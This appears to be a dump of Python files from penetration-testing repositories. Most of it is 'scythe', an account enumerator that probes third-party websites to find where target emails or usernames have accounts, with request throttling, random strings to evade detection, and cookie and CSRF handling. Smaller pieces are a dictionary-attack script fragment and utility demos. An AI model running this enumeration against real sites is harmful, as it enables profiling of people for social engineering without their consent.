parser.add_argument("-f", action="store", dest="filename", default=None, help="Filename of directories or pages to test for")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if (args.target == None) or (args.filename == None):
parser.print_help()
sys.exit(1)
# Set Constructors
verbose = args.verbose # Verbosity level
filename = args.filename # The data to use for the dictionary attack
target = args.target # Password or hash to test against default is admin
host_test(filename, target)
if __name__ == '__main__':
main()
| 44.060976 | 151 | 0.691391 |
Hands-On-Penetration-Testing-with-Python | from XtremeWebAPP.xtreme_server.models import *
from django.contrib import admin
admin.site.register(Project)
admin.site.register(Settings)
admin.site.register(Page)
admin.site.register(Form)
admin.site.register(LearntModel)
admin.site.register(Vulnerability) | 28.888889 | 48 | 0.809701 |
Penetration_Testing | #!/usr/bin/python
# Converts to hex, ascii, decimal, octal, binary, base64, or little-endian.
import sys
from binascii import unhexlify, b2a_base64
def ascToHex(string):
in_hex = string.encode('hex')
return in_hex
def toLittleEndian(string):
little_endian = '0x' + "".join(reversed([string[i:i+2]
for i in range(0, len(string), 2)]))
return little_endian
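# For example (worked by hand from the function above):
# toLittleEndian('deadbeef') reverses the byte pairs and returns '0xefbeadde'.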
def toDecimal(string):
in_dec = int(string, 16)
return in_dec
def toAscii(string):
in_ascii = string.decode('hex')
return in_ascii
def toOctal(string):
in_oct = ""
c = 0
for char in string:
c = ord(char)
octa = oct(c)
in_oct += ' ' + str(octa)
return in_oct
def hexToBin(string):
in_hex = int(string, 16)
in_bin = bin(in_hex)[2:]
return in_bin
def binToHex(string):
in_hex = hex(int(string, 2))
return in_hex
def decToHex(number):
in_hex = hex(int(number))
return in_hex
def hexToB64(string):
raw = unhexlify(string)
in_b64 = b2a_base64(raw)
return in_b64
def main():
if len(sys.argv[1:]) != 2:
print '''
format_convert: Convert to hex, ascii, decimal, octal, binary, base64 or little-endian.
Usage: ./format_convert.py <string> <option>
Example: ./format_convert.py 41 -2ascii
Options:
-asc2hex : Ascii to hex
-2ascii : Hex to ascii
-2dec : To decimal
-2oct : To octal
-2le : Big endian to little endian
-hex2bin : Hex to binary
-bin2hex : Binary to hex
-dec2hex : Decimal to hex
-hex2b64 : Hex to base64
'''
sys.exit(0)
# Original input
to_convert = sys.argv[1]
mode = sys.argv[2]
# Conversion
if mode == '-asc2hex':
in_hex = ascToHex(to_convert)
little_endian = toLittleEndian(in_hex)
print 'Original:', to_convert, '\nHex:', '0x' + in_hex
print 'Little-endian:', little_endian
elif mode == '-2ascii':
in_ascii = toAscii(to_convert)
print 'Original:', to_convert, '\nAscii:', in_ascii
elif mode == '-2dec':
in_dec = toDecimal(to_convert)
print 'Original:', to_convert, '\nDecimal:', in_dec
elif mode == '-2oct':
in_oct = toOctal(to_convert)
print 'Original:', to_convert, '\nOctal:', in_oct, '\n\n[!] Note: Remove any extra leading zeroes.'
elif mode == '-2le':
inpt = toAscii(to_convert)
in_hex = ascToHex(inpt)
in_LE = toLittleEndian(in_hex)
print 'Original:', '0x' + to_convert, '\nLittle-endian:', in_LE
elif mode == '-hex2bin':
in_bin = hexToBin(to_convert)
print 'Originial:', to_convert, '\nBinary:', in_bin
elif mode == '-bin2hex':
in_hex = binToHex(to_convert)
print in_hex
elif mode == '-dec2hex':
in_hex = decToHex(to_convert)
print in_hex
elif mode == '-hex2b64':
in_b64 = hexToB64(to_convert)
print in_b64
else:
print 'Improper format. Review and re-submit.\n'
sys.exit(0)
main()
| 19.240602 | 101 | 0.657748 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
class ExceptionHandeling():
def __init__(self):
pass
def div_1(self,num1,num2):
try:
num3=num1/num2
print("Division result : " +str(num3))
except Exception as ex:
print("Exception : "+str(ex))
def div_2(self,num1,num2):
try:
num3=num1/num2
print("Division result : " +str(num3))
except Exception as ex:
print("Exception : "+str(ex))
finally:
print("Cleaning Up")
del num1
del num2
def div_3(self,num1,num2):
try:
if num2 == 0:
raise ValueError('Division by 0 will throw exception')
else:
num3=num1/num2
print("Division result : " +str(num3))
except Exception as exc:
print("Exception : "+str(exc))
obj=ExceptionHandeling()
obj.div_1(10,2)
obj.div_1(10,0)
print("\n")
obj.div_2(10,2)
obj.div_2(10,0)
print("\n")
obj.div_3(10,2)
obj.div_3(10,0)
| 18.511628 | 58 | 0.634845 |
Penetration-Testing-Study-Notes | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
"""
scythe: account enumerator
Account Enumerator is designed to make it simple to perform account
enumeration as part of security testing. The framework offers the ability
to easily create new modules (XML files) and speed up the process of testing.
This tool was created with 2 main use cases in mind:
- The ability to test a range of email addresses across a range of sites (e.g.
social media, blogging platforms, etc...) to find where those targets have
active accounts. This can be useful in a social engineering test where you
have email accounts for a company and want to list where these users have
used their work email for 3rd party web based services.
- The ability to quickly create a custom testcase module and use it to enumerate
    for a list of active accounts, using either a list of known usernames, email
    addresses, or a dictionary of common account names.
    This program is released as is and is not designed to be used to test against sites
where you do not have permission. Any modules provided are for demonstration purposes
and may breach end user license agreements if used against a site. Your mileage may
vary... be responsible!
    External module dependencies:
colorama (Windows only, optional)
"""
import os
import re
import signal
import urllib
import urllib2
import string
import textwrap
import sys
import traceback
import time
import Queue
import random
from Cookie import BaseCookie
from threading import Thread, activeCount, Lock, current_thread
from random import Random
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
from array import *
from xml.dom.minidom import parse
__author__ = 'Chris John Riley'
__license__ = 'BSD (3-Clause)'
__version__ = '0.2.81'
__codename__ = 'Lazy Lizard'
__date__ = '24 May 2013'
__maintainer__ = 'ChrisJohnRiley'
__email__ = '[email protected]'
__status__ = 'Beta'
modules = []
accounts = []
success = []
color = {}
queue = Queue.Queue()
startTime = time.clock()
sigint = False
def logo():
# because ASCII-art is the future!
logo = '''
,,
mm `7MM
MM MM
,pP"Ybd ,p6"bo `7M' `MF'mmMMmm MMpMMMb. .gP"Ya
8I `" 6M' OO VA ,V MM MM MM ,M' Yb
`YMMMa. 8M VA ,V MM MM MM 8M""""""
L. I8 YM. , VVV MM MM MM YM. ,
M9mmmP' YMbmd' ,V `Mbmo.JMML JMML.`Mbmmd'
,V
OOb" ::: account harvester :::'''
# add version, codename and maintainer to logo
print logo
print string.rjust('ver ' + __version__ + ' (' + __codename__ + ')', 74)
print string.rjust(__maintainer__, 73)
def extract_module_data(file, module_dom):
# extract module information from the provided dom
for each in module_dom:
try:
xmlData = {}
# try/except blocks to handle badly formed XML modules
try:
xmlData['name'] = each.getElementsByTagName('name')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['name'] = 'unspecified'
# set URL - prepend http:// if not present in string
if not each.getElementsByTagName('url')[0].firstChild.nodeValue.startswith('http'):
xmlData['url'] = 'http://' + each.getElementsByTagName('url')[0].firstChild.nodeValue
else:
xmlData['url'] = each.getElementsByTagName('url')[0].firstChild.nodeValue
# set Method
try:
xmlData['method'] = each.getElementsByTagName('method')[0].firstChild.nodeValue
except (IndexError, AttributeError):
# default to GET if not specified
xmlData['method'] = 'GET'
# set POST Parameters if set in the module XML
try:
if each.getElementsByTagName('postParameters')[0].firstChild.nodeValue.lower() == 'false':
                    # handle instances where people enter False instead of leaving this field blank
xmlData['postParameters'] = ''
else:
xmlData['postParameters'] = \
each.getElementsByTagName('postParameters')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['postParameters'] = ''
# set headers if set in the module XML
try:
if each.getElementsByTagName('headers')[0].firstChild.nodeValue.lower() == 'false':
                    # handle instances where people enter False instead of leaving this field blank
xmlData['headers'] = ''
else:
xmlData['headers'] = \
each.getElementsByTagName('headers')[0].firstChild.nodeValue.split(",")
except (IndexError, AttributeError):
xmlData['headers'] = ''
# set request cookie if set in the module XML
try:
if each.getElementsByTagName('requestCookie')[0].firstChild.nodeValue.lower() == 'true':
xmlData['requestCookie'] = True
else:
xmlData['requestCookie'] = False
except (IndexError, AttributeError):
xmlData['requestCookie'] = False
# set csrf mode if set in the module XML
# Extract csrf_url and csrf_regex if present
# if not default to False
try:
if each.getElementsByTagName('requestCSRF')[0].firstChild.nodeValue.lower() == 'false':
xmlData['requestCSRF'] = False
# set csrf_url and csrf_regex to False by default
xmlData['csrf_url'] = False
xmlData['csrf_regex'] = False
else:
xmlData['requestCSRF'] = True
if each.getElementsByTagName('csrf_url')[0].firstChild:
xmlData['csrf_url'] = \
each.getElementsByTagName('csrf_url')[0].firstChild.nodeValue
else:
# if no specific csrf_url is set, default to xmlData['url']'
xmlData['csrf_url'] = xmlData['url']
if each.getElementsByTagName('csrf_regex')[0].firstChild:
xmlData['csrf_regex'] = \
each.getElementsByTagName('csrf_regex')[0].firstChild.nodeValue
else:
xmlData['csrf_regex'] = 'unspecified'
except (IndexError, AttributeError):
# if requestCSRF not present or noneType
xmlData['requestCSRF'] = False
xmlData['csrf_url'] = False
xmlData['csrf_regex'] = False
# set success match if specified in the module XML
try:
xmlData['successmatch'] = \
each.getElementsByTagName('successmatch')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['successmatch'] = ''
# set negative match if specified in the module XML
try:
                # handle instances where people enter False instead of leaving this field blank
if each.getElementsByTagName('negativematch')[0].firstChild.nodeValue.lower() == 'false':
xmlData['negativematch'] = ''
else:
xmlData['negativematch'] = \
each.getElementsByTagName('negativematch')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['negativematch'] = ''
# set error match if specified in the module XML
try:
                # handle instances where people enter False instead of leaving this field blank
if each.getElementsByTagName('errormatch')[0].firstChild.nodeValue.lower() == 'false':
xmlData['errormatch'] = ''
else:
xmlData['errormatch'] = \
each.getElementsByTagName('errormatch')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['errormatch'] = ''
# set message if specified in the module XML
try:
                # handle instances where people enter False instead of leaving this field blank
if each.getElementsByTagName('message')[0].firstChild.nodeValue.lower() == 'false':
xmlData['message'] = ''
else:
xmlData['message'] = \
each.getElementsByTagName('message')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['message'] = ''
# set module date
try:
xmlData['date'] = each.getElementsByTagName('date')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['date'] = 'unspecified'
# set module version if specified in the module XML
try:
xmlData['version'] = each.getElementsByTagName('version')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['version'] = 'unspecified'
# set module author
try:
xmlData['author'] = each.getElementsByTagName('author')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['author'] = 'unlisted'
# set category
try:
xmlData['category'] = each.getElementsByTagName('category')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['category'] = 'unspecified'
# filter modules based on selected categories
if xmlData['category'].lower() in (cat.lower() for cat in opts.category) or \
"all" in (cat.lower() for cat in opts.category) or \
(opts.single.lower() and opts.single.lower() in xmlData['name'].lower()) or \
(file.lower() in opts.single.lower()):
if xmlData['category'].lower() == "example" and \
("example" not in (cat.lower() for cat in opts.category) \
and not opts.single):
# skip example module when running with all or default settings
if opts.verbose:
print "\t[" + color['red'] + "!" + color['end'] \
+ "] Skipping example module : %s" % xmlData['name']
else:
print "\t[" + color['yellow'] + "+" + color['end'] \
+"] Extracted module information from %s" \
% xmlData['name']
modules.append(xmlData)
# print module message if present
if xmlData['message']:
print textwrap.fill(("\t[" + color['yellow'] + "!" + color['end'] \
+"] "+ color['red'] + "Note" + color['end'] +" [%s]:" \
% xmlData['name']),
initial_indent='', subsequent_indent='\t -> ', width=100)
print textwrap.fill(("\t -> %s" % xmlData['message']),
initial_indent='', subsequent_indent='\t -> ', width=80)
else:
if opts.debug and not opts.category == "single":
print "\t[" + color['red'] + "!" + color['end'] \
+ "] Skipping module %s. Not in category (%s)" \
% (xmlData['name'], opts.category)
except Exception, ex:
print "\t[" + color['red'] + "!" + color['end'] \
+ "] Failed to extracted module information\n\t\tError: %s" % ex
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
continue
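# Illustrative module skeleton (all values hypothetical) showing the XML tags
# that extract_module_data() above looks for in each module file; <ACCOUNT> and
# <RANDOM> are the placeholders substituted later in create_testcases():
#
# <site>
#     <name>Example Site</name>
#     <url>http://www.example.com/<ACCOUNT></url>
#     <method>GET</method>
#     <postParameters>false</postParameters>
#     <headers>false</headers>
#     <requestCookie>false</requestCookie>
#     <requestCSRF>false</requestCSRF>
#     <csrf_url>false</csrf_url>
#     <csrf_regex>false</csrf_regex>
#     <successmatch>profile found</successmatch>
#     <negativematch>false</negativematch>
#     <errormatch>error occurred</errormatch>
#     <message>false</message>
#     <date>24 May 2013</date>
#     <version>0.1</version>
#     <author>example author</author>
#     <category>example</category>
# </site>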
def output_modules():
# print information about the loaded module(s)
print "\n ------------------------------------------------------------------------------"
print string.center(color['yellow'] + ">>>>>" + color['end'] + " Module Information " + \
color['yellow'] + "<<<<<" + color['end'], 100)
print " ------------------------------------------------------------------------------"
if opts.verbose and not opts.listmodules:
for mod in modules:
print textwrap.fill((" NAME: %s" % mod['name']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" URL: %s" % mod['url']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" METHOD: %s" % mod['method']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" HEADERS: %s" % mod['headers']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" POST PARAMETERS: %s" % mod['postParameters']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" REQUEST COOKIE: %s" % mod['requestCookie']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" REQUEST CSRF TOKEN: %s" % mod['requestCSRF']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" SUCCESS MATCH: %s" % mod['successmatch']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" NEGATIVE MATCH: %s" % mod['negativematch']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" ERROR MATCH: %s" % mod['errormatch']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" MODULE NOTE: %s" % mod['message']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" DATE: %s" % mod['date']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" VERSION: %s" % mod['version']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" AUTHOR: %s" % mod['author']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" CATEGORY: %s" % mod['category']),
initial_indent='', subsequent_indent=' -> ', width=80)
print " ------------------------------------------------------------------------------"
else:
print " ", "| Name |".ljust(35), "| Category |".ljust(26), "| Version |".ljust(8)
print " ------------------------------------------------------------------------------"
for mod in modules:
print " " + mod['name'].ljust(37) + mod['category'].ljust(30) + mod['version'].ljust(10)
print " ------------------------------------------------------------------------------\n"
# exit after providing module list
sys.exit(0)
def output_accounts():
# print information about the accounts loaded from accountfile
print "\n ------------------------------------------------------------------------------"
print string.center(color['yellow'] + ">>>>>" + color['end'] + " Accounts Loaded " + \
color['yellow'] + "<<<<<" + color['end'], 100)
print " ------------------------------------------------------------------------------"
for a in accounts:
print textwrap.fill((" Account name: %s" % a),
initial_indent='', subsequent_indent=' -> ', width=80)
print " ------------------------------------------------------------------------------\n"
def output_success():
# print information about success matches
if opts.summary or (opts.verbose and opts.summary):
print "\n ------------------------------------------------------------------------------"
print string.center(color['yellow'] + ">>>>>" + color['end'] + " Successful Matches " + \
color['yellow'] + "<<<<<" + color['end'], 100)
print " ------------------------------------------------------------------------------"
s_success = sorted(success, key=lambda k: k['name']) # group by site name
# print normal summary table on request (--summary)
if not opts.verbose and opts.summary:
print "\n ------------------------------------------------------------------------------"
print " ", "| Module |".ljust(35), " | Account |".ljust(28)
print " ------------------------------------------------------------------------------"
for s in s_success:
print " " + s['name'].ljust(37) + s['account'].ljust(30)
print " ------------------------------------------------------------------------------\n"
# print verbose summary on request (-v --summary)
elif opts.verbose and opts.summary:
for s in s_success:
print textwrap.fill((" NAME: \t\t\t%s" % s['name']),
initial_indent='', subsequent_indent='\t -> ', width=80)
print textwrap.fill((" ACCOUNT: \t\t%s" % s['account']),
initial_indent='', subsequent_indent='\t -> ', width=80)
print textwrap.fill((" URL: \t\t\t%s" % s['url']),
initial_indent='', subsequent_indent='\t -> ', width=80)
print textwrap.fill((" METHOD: \t\t%s" % s['method']),
initial_indent='', subsequent_indent='\t -> ', width=80)
print textwrap.fill((" POST PARAMETERS: \t%s" % s['postParameters']),
initial_indent='', subsequent_indent='\t -> ', width=80)
print " ------------------------------------------------------------------------------"
else:
print " ------------------------------------------------------------------------------\n"
def load_modules():
# load the modules from moduledir
# only XML files are permitted
if not "all" in (cat.lower() for cat in opts.category):
# using options from command line
if opts.verbose:
print " [" + color['yellow'] + "-" + color['end'] \
+ "] using command line supplied category : %s" \
% ", ".join(opts.category)
for (path, dirs, files) in os.walk(opts.moduledir):
for d in dirs:
if d.startswith("."): # ignore hidden . dirctories
dirs.remove(d)
print " [" + color['yellow'] + "-" + color['end'] \
+"] Starting to load modules from %s" % path
for file in files:
if not path.endswith('/'):
path = path + '/'
# read in modules
if file.endswith('.xml') and not file.startswith('.'):
if opts.verbose:
print "\t[ ] Checking module : %s" % file
try:
module_dom = parse(path + file)
module_dom = module_dom.getElementsByTagName('site')
extract_module_data(file, module_dom)
except:
print "\t[" + color['red'] + "!" + color['end'] \
+"] Error parsing %s module, check XML" % file
elif opts.debug:
print "\t[" + color['red'] + "!" + color['end'] \
+ "] Skipping non-XML file : %s" % file
if opts.verbose or opts.listmodules:
output_modules() #debug and module output
def load_accounts():
# if account is passed in we use that, otherwise
# load accounts from accountfile
# one account per line
if opts.account:
# load account from command line
if opts.verbose:
print " [" + color['yellow'] + "-" + color['end'] \
+ "] using command line supplied user(s) : %s" \
% ", ".join(opts.account)
for a in opts.account:
# add all command line accounts to array for testcases
if a: # ignore empty fields
accounts.append(a)
else:
# load accounts from file if it exists
if not os.path.exists(opts.accountfile):
print "\n [" + color['red'] + "!" + color['end'] \
+ "] The supplied file (%s) does not exist!" \
% opts.accountfile
sys.exit(0)
account_file = open(opts.accountfile, 'r')
account_read = account_file.readlines()
account_read = [item.rstrip() for item in account_read]
for a in account_read:
if not a.startswith("#"): # ignore comment lines in accountfile
accounts.append(a)
if opts.verbose:
output_accounts() # debug output
def create_testcases():
# create a list of testcases from accounts and modules
#
# replace functions are in place to replace <ACCOUNT>
# with the account names presented
# the script will also replace any instances of <RANDOM>
# with a random string (8) to avoid detection
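    # For example (illustrative values only, not from any real module): a module
    # URL template such as
    #   http://example.com/users/<ACCOUNT>?nocache=<RANDOM>
    # tested against account "alice" would be requested as something like
    #   http://example.com/users/alice?nocache=aB3xK9Qz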
testcases = []
tempcase = {}
for a in accounts:
for m in modules:
rand = ''.join( Random().sample(string.letters+string.digits, 8) ) # 8 random chars
tempcase['url'] = m['url'].replace("<ACCOUNT>", a).replace("<RANDOM>", rand)
tempcase['account'] = a
tempcase['name'] = m['name']
tempcase['method'] = m['method']
tempcase['postParameters'] = m['postParameters'].replace("<ACCOUNT>", a).replace("<RANDOM>", rand)
tempcase['headers'] = m['headers']
tempcase['requestCookie'] = m['requestCookie']
tempcase['requestCSRF'] = m['requestCSRF']
tempcase['csrf_url'] = m['csrf_url']
tempcase['csrf_regex'] = m['csrf_regex']
tempcase['successmatch'] = m['successmatch']
tempcase['negativematch'] = m['negativematch']
tempcase['errormatch'] = m['errormatch']
testcases.append(tempcase)
tempcase = {}
if testcases:
return testcases
else:
print " [" + color['red'] + "!" + color['end'] + \
"] No testcases created, check your accounts and module settings"
print
sys.exit(0)
def request_handler(testcases):
# handle requests present in testcases
print "\n ------------------------------------------------------------------------------"
print string.center(color['yellow'] + ">>>>>" + color['end'] + " Testcases " + \
color['yellow'] + "<<<<<" + color['end'], 100)
print " ------------------------------------------------------------------------------"
print " [" + color['yellow'] + "-" + color['end'] \
+"] Starting testcases (%d in total)" % len(testcases)
if opts.wait:
print " [" + color['yellow'] + "-" + color['end'] \
+"] Throttling in place (%.2f seconds)\n" % opts.wait
elif opts.threads:
print " [" + color['yellow'] + "-" + color['end'] \
+"] Threading in use (%d threads max)\n" % opts.threads
else:
print
progress = 0 # initiate progress count
if opts.threads > 1:
threads = []
for test in testcases:
# add testcases to queue
queue.put(test)
# create progress update lock
progress_lock = Lock()
while not queue.empty() and not sigint:
# only allow a limited number of threads
if opts.threads >= activeCount() and not sigint:
# get next test from queue
test = queue.get()
try:
# setup thread to perform test
t = Thread(target=make_request, args=(test,))
t.daemon=True
threads.append(t)
t.start()
finally:
# iterate progress value for the progress bar
progress = len(testcases) - queue.qsize()
# call progressbar
progress_lock.acquire()
try:
progressbar(progress, len(testcases))
finally:
progress_lock.release()
# mark task as done
queue.task_done()
# wait for queue and threads to end before continuing
while activeCount() > 1:
# keep main program active to catch keyboard interrupts
time.sleep(0.1)
for thread in threads:
thread.join()
# no more active threads. resolve queue
queue.join()
else:
for test in testcases:
# make request without using threading
make_request(test)
# iterate progress value for the progress bar
progress = progress +1
# call progressbar
progressbar(progress, len(testcases))
if opts.wait: # wait X seconds as per wait setting
time.sleep(opts.wait)
return
def progressbar(progress, total):
# progressbar
if total > 50: # only show progress on tests of > 50
if not progress == 0:
# set percentage
progress_percentage = int(100 / (float(total) / float(progress)))
# display progress at set points
total = float(total)
# calculate progress for 25, 50, 75, and 99%
vals = [int(total/100*25), int(total/100*50), int(total/100*75), int(total-1)]
if progress in vals:
print " [" + color['yellow'] + "-" + color['end'] +"] [%s] %s%% complete\n" \
% ((color['yellow'] + ("#"*(progress_percentage / 10)) + \
color['end']).ljust(10, "."),progress_percentage),
def make_request(test, retry=0, wait_time=False):
# make request and add output to array
# set threadname
if not current_thread().name == 'MainThread':
threadname = "[" + current_thread().name +"] >"
else:
# return blank string when not using threading
threadname = '>'
# GET method worker
if test['method'] == 'GET':
test, resp, r_info, req = get_request(test)
# success match
if resp and test['successmatch']:
matched = success_check(resp, test['successmatch'])
if matched:
print " [" + color['green'] + "X" + color['end'] + "] Account %s exists on %s" \
% (test['account'], test['name'])
success.append(test)
if opts.debug:
                    print # spacing for verbose output
if opts.outputfile:
# log to outputfile
opts.outputfile.write("Account " + test['account'] + " exists on " \
+ test['name'] +"\n")
# error match
if resp and test['errormatch']:
error = error_check(resp, test['errormatch'])
if error and retry >= opts.retries:
print " [" + color['red'] + "!" + color['end'] + \
"] %s Retries exceeded when testing account %s on %s" \
% (threadname, test['account'], test['name'])
elif error:
print " [" + color['yellow'] + "!" + color['end'] + \
"] %s Error detected when testing account %s on %s" \
% (threadname, test['account'], test['name'])
# wait X seconds and retry
if wait_time:
# double existing wait_time
wait_time = wait_time * 2
else:
# set starting point for wait_time
wait_time = opts.retrytime
if opts.verbose:
print " [ ] %s Waiting %d seconds before retry" \
% (threadname, wait_time)
time.sleep(wait_time)
# increment retry counter
retry = retry + 1
if opts.verbose:
print " [ ] %s Attempting retry (%d of %d)" \
% (threadname, retry, opts.retries)
make_request(test, retry, wait_time)
return
# negative match
if resp and test['negativematch']:
matched = negative_check(resp, test['negativematch'])
if matched and opts.verbose:
print " [" + color['red'] + "X" + color['end'] + "] Negative matched %s on %s" \
% (test['account'], test['name'])
# advance debug output
if resp and opts.debugoutput:
debug_save_response(test, resp, r_info, req)
return
# POST method worker
elif test['method'] == 'POST':
test, resp, r_info, req = post_request(test)
# success match
if resp and test['successmatch']:
matched = success_check(resp, test['successmatch'])
if matched:
print " [" + color['green'] + "X" + color['end'] + "] Account %s exists on %s" \
% (test['account'], test['name'])
success.append(test)
if opts.debug:
                    print # spacing for verbose output
if opts.outputfile:
# log to outputfile
opts.outputfile.write("Account " + test['account'] + " exists on " \
+ test['name'] +"\n")
# error match
if resp and test['errormatch']:
error = error_check(resp, test['errormatch'])
if error and retry >= opts.retries:
print " [" + color['red'] + "!" + color['end'] + \
"] %s Retries exceeded when testing account %s on %s" \
% (threadname, test['account'], test['name'])
elif error:
print " [" + color['yellow'] + "!" + color['end'] + \
"] %s Error detected when testing account %s on %s" \
% (threadname, test['account'], test['name'])
# wait X seconds and retry
if wait_time:
# double existing wait_time
wait_time = wait_time * 2
else:
# set starting point for wait_time
wait_time = opts.retrytime
if opts.verbose:
print " [ ] %s Waiting %d seconds before retry" \
% (threadname, wait_time)
time.sleep(wait_time)
# increment retry counter
retry = retry + 1
if opts.verbose:
print " [ ] %s Attempting retry (%d of %d)" \
% (threadname, retry, opts.retries)
make_request(test, retry, wait_time)
# negative match
if resp and test['negativematch']:
matched = negative_check(resp, test['negativematch'])
if matched and opts.verbose:
print " [" + color['red'] + "X" + color['end'] + "] Negative matched %s on %s" \
% (test['account'], test['name'])
if resp and opts.debugoutput:
debug_save_response(test, resp, r_info, req)
return
else:
print " [" + color['red'] + "!" + color['end'] + "] Unknown Method %s : %s" \
% test['method'], test['url']
return
def get_request(test):
# perform GET request
urllib.urlcleanup() # clear cache
try:
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
req_headers = { 'User-Agent' : user_agent }
for each in test['headers']:
key, val = each.split(":", 1)
key = key.lstrip()
val = val.lstrip()
req_headers[key] = val
if test['requestCookie'] or test['requestCSRF']:
# request cookie and csrf token if set in module XML
cookie_val, csrf_val = request_value(test)
if cookie_val:
req_headers['cookie'] = cookie_val
if csrf_val:
# replace <CSRFTOKEN> with the collected token
test['url'] = test['url'].replace("<CSRFTOKEN>", csrf_val)
test['postParameters'] = test['postParameters'].replace("<CSRFTOKEN>", csrf_val)
test['headers'] = [h.replace('<CSRFTOKEN>', csrf_val) for h in test['headers']]
if opts.debug:
# print debug output
print textwrap.fill((" [ ] URL (GET): %s" % test['url']),
initial_indent='', subsequent_indent=' -> ', width=80)
print
# assign NullHTTPErrorProcessor as default opener
opener = urllib2.build_opener(NullHTTPErrorProcessor())
urllib2.install_opener(opener)
req = urllib2.Request(test['url'], headers=req_headers)
f = urllib2.urlopen(req)
r_body = f.read()
r_info = f.info()
f.close()
# handle instances where the response body is 0 bytes in length
if not r_body:
print " [" + color['red'] + "!" + color['end'] + "] Zero byte response received from %s" \
% test['name']
r_body = "<Scythe Message: Empty response from server>"
# returned updated test and response data
return test, r_body, r_info, req
except Exception:
print textwrap.fill((" [" + color['red'] + "!" + color['end'] + "] Error contacting %s" \
% test['url']), initial_indent='', subsequent_indent='\t', width=80)
if opts.debug:
for ex in traceback.format_exc().splitlines():
print textwrap.fill((" %s" \
% str(ex)), initial_indent='', subsequent_indent='\t', width=80)
print
return test, False, False, req
def post_request(test):
# perform POST request
urllib.urlcleanup() # clear cache
try:
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
req_headers = { 'User-Agent' : user_agent }
if test['requestCookie'] or test['requestCSRF']:
# request cookie and csrf token if set in module XML
cookie_val, csrf_val = request_value(test)
if cookie_val:
req_headers['cookie'] = cookie_val
if csrf_val:
# replace <CSRFTOKEN> with the collected token
test['url'] = test['url'].replace("<CSRFTOKEN>", csrf_val)
test['postParameters'] = test['postParameters'].replace("<CSRFTOKEN>", csrf_val)
test['headers'] = [h.replace('<CSRFTOKEN>', csrf_val) for h in test['headers']]
if test['headers']:
for each in test['headers']:
key, val = each.split(":", 1)
key = key.lstrip()
val = val.lstrip()
req_headers[key] = val
if opts.debug:
# print debug output
print textwrap.fill((" [ ] URL (POST): %s" % test['url']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" [ ] POST PARAMETERS: %s" % test['postParameters']),
initial_indent='', subsequent_indent=' -> ', width=80)
print
# assign NullHTTPErrorProcessor as default opener
opener = urllib2.build_opener(NullHTTPErrorProcessor())
urllib2.install_opener(opener)
req = urllib2.Request(test['url'], test['postParameters'], req_headers)
f = urllib2.urlopen(req)
r_body = f.read()
r_info = f.info()
f.close()
# handle instances where the response body is 0 bytes in length
if not r_body:
print " [" + color['red'] + "!" + color['end'] + "] Zero byte response received from %s" \
% test['name']
r_body = "<Scythe Message: Empty response from server>"
# returned updated test and response data
return test, r_body, r_info, req
except Exception:
print textwrap.fill((" [" + color['red'] + "!" + color['end'] + "] Error contacting %s" \
% test['url']), initial_indent='', subsequent_indent='\t', width=80)
if opts.debug:
for ex in traceback.format_exc().splitlines():
print textwrap.fill((" %s" \
% str(ex)), initial_indent='', subsequent_indent='\t', width=80)
print
return test, False, False, req
def request_value(test):
# request a cookie or CSRF token from the target site for use during the logon attempt
urllib.urlcleanup() # clear cache
# assign NullHTTPErrorProcessor as default opener
opener = urllib2.build_opener(NullHTTPErrorProcessor())
urllib2.install_opener(opener)
# capture cookie first for use with the CSRF token request
# capture Set-Cookie
if test['requestCookie']:
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
req_headers = { 'User-Agent' : user_agent }
if test['csrf_url']:
# if csrf_url is set, use the same page to collect cookies
url = test['csrf_url']
else:
url = test['url'].split("?", 1)[0] # strip parameters from url where present
req_val = urllib2.Request(url, headers=req_headers)
response = urllib2.urlopen(req_val)
resp_body = response.read()
if response.info().getheader('Set-Cookie'):
set_cookie = response.info().getheader('Set-Cookie') # grab Set-cookie
# work Set-cookie into valid cookies to set
bcookie = BaseCookie(set_cookie)
# strip off unneeded attributes (e.g. expires, path, HTTPOnly etc...
cookie_val = bcookie.output(attrs=[], header="").lstrip()
else:
cookie_val = False
print " [" + color['red'] + "!" + color['end'] \
+ "] Set-Cookie Error: No valid Set-Cookie response received"
